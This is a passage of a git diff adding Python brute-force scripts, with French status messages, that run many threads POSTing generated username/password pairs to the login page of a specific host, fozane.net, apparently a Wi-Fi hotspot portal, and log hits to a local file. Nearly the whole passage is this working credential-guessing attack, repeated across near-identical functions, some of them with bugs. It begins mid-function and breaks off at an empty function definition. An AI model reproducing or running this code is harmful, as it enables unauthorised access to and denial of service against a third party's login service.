+ if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack10(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=18 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack11(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=20 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack12(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=22 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") +def crack13(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=24 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t3=int((1/(t2-t1))*14) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec ".format(user,t3),end="\r") + +print(" demarage du moteur ...") + +t1=threading.Thread(target=crack) +t2=threading.Thread(target=crack2) +t3=threading.Thread(target=crack3) +t4=threading.Thread(target=crack4) +t5=threading.Thread(target=crack5) +t6=threading.Thread(target=crack6) +t7=threading.Thread(target=crack7) +t8=threading.Thread(target=crack8) +t9=threading.Thread(target=crack9) +t10=threading.Thread(target=crack10) +t11=threading.Thread(target=crack11) +t12=threading.Thread(target=crack12) +t13=threading.Thread(target=crack13) +t1.start() +t2.start() +t3.start() +t4.start() +t5.start() +t6.start() +t7.start() +t8.start() +t9.start() +t10.start() +t11.start() +t12.start() +t13.start() +t1.join() +t2.join() +t3.join() +t4.join() +t5.join() +t6.join() +t7.join() +t8.join() +t9.join() +t10.join() +t11.join() +t12.join() +t13.join() diff --git a/crack/crack5.py b/crack/crack5.py new file mode 100644 index 0000000..9020432 --- /dev/null +++ b/crack/crack5.py @@ -0,0 +1,1339 @@ +import requests +import time +import threading +import getpass +last=0 +def crack(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=1 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack2(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=2 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack3(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=4 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack4(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=6 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack5(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=8 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack6(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=10 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack7(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=12 + y,z,u=0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack8(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=14 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack9(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=16 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack10(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=18 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack11(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=20 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack12(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=22 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack13(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=24 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack14(): + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=26 + x,y,z,u=0,0,0,last + if 26<=rec<=36: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack15(): + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=28 + x,y,z,u=0,0,0,last + if 26<=rec<=36: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack16(): + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=30 + x,y,z,u=0,0,0,last + if 26<=rec<=36: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack17(): + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=32 + x,y,z,u=0,0,0,last + if 26<=rec<=36: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack18(): + 